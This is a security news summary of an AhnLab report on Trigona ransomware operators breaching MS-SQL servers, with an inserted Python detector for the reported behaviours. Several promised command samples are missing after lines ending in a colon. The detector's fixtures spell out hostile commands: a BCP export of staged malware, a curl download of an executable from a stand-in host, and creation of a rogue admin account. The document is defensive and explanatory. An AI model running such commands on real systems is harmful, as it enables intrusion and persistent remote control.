The AhnLab Security Intelligence Center (ASEC) has published a new report revealing that the Trigona ransomware threat actors are still actively targeting Microsoft SQL (MS-SQL) servers, evolving their attack toolkit to include new Rust-based scanners, remote access tools, and privilege escalation utilities.
According to AhnLab researchers, “The same threat actor is still active and is attacking targets in a similar manner to past cases, but is using new types of malware and tools.”
The Trigona group continues to exploit MS-SQL servers exposed to the internet, specifically those configured with weak credentials or default ports. Once they gain access via brute-force or dictionary attacks, the attackers deploy a CLR shell to execute system commands and install additional payloads.
ASEC explains, “The Trigona threat actors are attacking MS-SQL servers that are vulnerable to brute-force and dictionary attacks because their accounts are configured with simple credentials, or that are exposed to the public. After successfully logging in, the threat actors use CLR Shell to install additional payloads.”
Immediately after compromise, the attackers enumerate the system environment using basic reconnaissance commands such as:
This reconnaissance step prepares the environment for the next phase — malware installation.
One of the most distinctive aspects of Trigona’s attacks is their use of the Bulk Copy Program (BCP), a command-line utility for importing and exporting large datasets in MS-SQL. The attackers exploit BCP to store and reconstruct binary malware within SQL tables, then export it as executable files onto the infected host.
ASEC notes, “The threat actor used BCP to store malware in the database and then create it as a file locally. This means that the threat actor used the following commands in the table ‘uGnzBdZbsi’ where the malware is stored to export the malware to a local path.”
Sample commands observed include:
These identifiers, the table name uGnzBdZbsi and the file name FODsOZKgAU.txt, were also used in Trigona's 2024 campaigns, confirming operational continuity.
In addition to BCP, the group leverages curl, Bitsadmin, and PowerShell to download malicious executables:
As seen in previous Trigona operations, the threat actors rely heavily on remote management tools to maintain persistence and manual control over compromised systems.
“As in previous cases, the threat actor abused AnyDesk to control the infected system. They installed AnyDesk in the %ALLUSERSPROFILE% path using the following commands,” AhnLab wrote.
The attackers also enable Remote Desktop Protocol (RDP) by creating new administrative accounts, often named “Remote99,” “Ladmin,” or “erp2,” and modify related registry keys to facilitate logins.
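The BCP export, the downloader usage and the AnyDesk and account-creation steps described above can be turned into host-level detections. The following is an added example, not code from the AhnLab report, that classifies constructed Windows process-creation events against those behaviours; the event fields and sample command lines are constructed, and %ALLUSERSPROFILE% is assumed to be C:\ProgramData.

```python
# Added example (not from the AhnLab report): match process-creation events against
# the Trigona behaviours the article describes. Event fields and sample lines are
# constructed; %ALLUSERSPROFILE% is assumed to resolve to C:\ProgramData.
import re
from dataclasses import dataclass

SUSPECT_ACCOUNTS = {"remote99", "ladmin", "erp2"}   # account names cited in the report
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "powershell.exe"}

@dataclass
class ProcEvent:
    parent: str    # parent image basename, e.g. "sqlservr.exe"
    image: str     # child image basename
    cmdline: str   # full command line

def classify(ev: ProcEvent) -> list[str]:
    """Return the Trigona-style behaviours an event matches (empty list if none)."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    from_sql = parent == "sqlservr.exe"
    hits = []
    # BCP 'queryout' spawned by the SQL Server process: table contents written to disk
    if from_sql and image == "bcp.exe" and "queryout" in cmd:
        hits.append("bcp_queryout_from_sqlserver")
    # curl / bitsadmin / PowerShell fetching a URL from under the database engine
    if from_sql and image in DOWNLOADERS and re.search(r"https?://", cmd):
        hits.append("download_tool_from_sqlserver")
    # Local account creation using one of the names seen in the campaign
    m = re.search(r"\buser\s+(\S+)\s+\S+\s+/add\b", cmd)
    if image in ("net.exe", "net1.exe") and m and m.group(1) in SUSPECT_ACCOUNTS:
        hits.append("known_rdp_account_created")
    # AnyDesk running from %ALLUSERSPROFILE%
    if "anydesk" in image and "\\programdata\\" in cmd:
        hits.append("anydesk_in_allusersprofile")
    return hits

# Constructed sample telemetry: events 0-3 mirror the reported tradecraft,
# event 4 is a benign DBA export started from an interactive shell.
SAMPLE_EVENTS = [
    ProcEvent("sqlservr.exe", "bcp.exe",
              'bcp "SELECT c FROM uGnzBdZbsi" queryout C:\\Windows\\Temp\\FODsOZKgAU.txt -T'),
    ProcEvent("sqlservr.exe", "curl.exe", "curl http://example.invalid/p -o C:\\Windows\\Temp\\p.exe"),
    ProcEvent("cmd.exe", "net.exe", "net user Remote99 Passw0rd! /add"),
    ProcEvent("cmd.exe", "AnyDesk.exe", "C:\\ProgramData\\AnyDesk\\AnyDesk.exe"),
    ProcEvent("cmd.exe", "bcp.exe", "bcp sales.dbo.orders out C:\\export\\orders.dat -T -c"),
]

def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched behaviours, keeping only events that matched."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}
```

Running `triage(SAMPLE_EVENTS)` flags events 0 to 3 and leaves the interactive `bcp ... out` export unflagged, because the parent process, not the tool itself, is what separates the two.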
Notably, AhnLab identified a new downloader built with Bat2Exe, which installs an external MSI package suspected to deploy the Teramind remote monitoring tool.
“It appears that the threat actor utilized Teramind in addition to RDP and AnyDesk to control the infected system,” the researchers stated.
The latest campaign introduces new scanner malware written in Rust, designed to identify vulnerable RDP and MS-SQL endpoints across the internet.
“The scanner is written in Rust and when executed, it sends information about the infected system, including the IP and location information obtained through ‘ip-api.com’, to the C&C server. It then performs scans according to the commands given,” AhnLab reported.
Before deploying these scanners, the group often runs SpeedTest and a custom StressTester tool — also written in Go — that performs SQL injection and HTTP flood testing, likely for network reconnaissance and performance evaluation.
“StressTester is written in Go and provides testing features for SQL injection requests as well as GET and POST requests,” the report adds.
In addition to ransomware and remote access components, Trigona operators were seen deploying utilities to disable Windows Defender, delete traces, and replace legitimate executables.